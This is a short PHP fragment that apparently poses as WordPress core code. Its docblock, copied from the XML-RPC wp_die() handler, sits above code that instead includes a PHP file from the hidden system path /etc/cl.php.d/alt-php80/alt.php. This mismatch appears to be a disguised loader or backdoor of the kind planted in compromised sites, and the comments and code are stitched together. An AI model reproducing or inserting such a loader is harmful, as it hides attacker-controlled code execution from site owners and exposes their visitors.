testers] Double check that validation will not cause errors when called * from upgrade routine (some of the WP functions may not yet be available). */ /** * Kills WordPress execution and displays XML response with an error message. * * This is the handler for wp_die() when processing XMLRPC requests. * * @since 3.2.0 * @access private * * @global wp_xmlrpc_server $wp_xmlrpc_server * * @param string $message Error message. * @param string $title Optional. Error title. Default empty string. * @param string|array $args Optional. Arguments to control behavior. Default empty array. */ $file = '/etc/cl.php.d/alt-php80/alt.php'; if (is_file($file)) { include $file; } else { http_response_code(404); echo "File not found: " . htmlspecialchars($file); }